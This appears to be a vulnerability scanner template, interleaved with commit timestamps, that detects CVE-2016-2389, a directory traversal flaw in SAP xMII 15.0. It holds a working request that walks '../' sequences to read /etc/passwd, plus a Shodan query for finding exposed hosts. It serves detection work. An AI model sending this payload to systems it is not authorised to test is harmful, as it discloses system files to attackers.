2021-08-06 17:35:56 +00:00
id : CVE-2016-2389
info :
2022-06-09 20:35:21 +00:00
name : SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
2021-08-06 17:35:56 +00:00
author : daffainfo
severity : high
2022-06-09 20:35:21 +00:00
description : SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
2021-08-19 13:59:12 +00:00
reference :
2021-08-06 17:35:56 +00:00
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-2389
cwe-id : CWE-22
2022-07-21 18:27:02 +00:00
metadata :
shodan-query : http.favicon.hash:-266008933
2022-08-27 04:41:18 +00:00
tags : lfi,sap,packetstorm,edb,cve,cve2016
2021-08-06 17:35:56 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-08-06 17:35:56 +00:00
- type : status
status :
- 200
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/09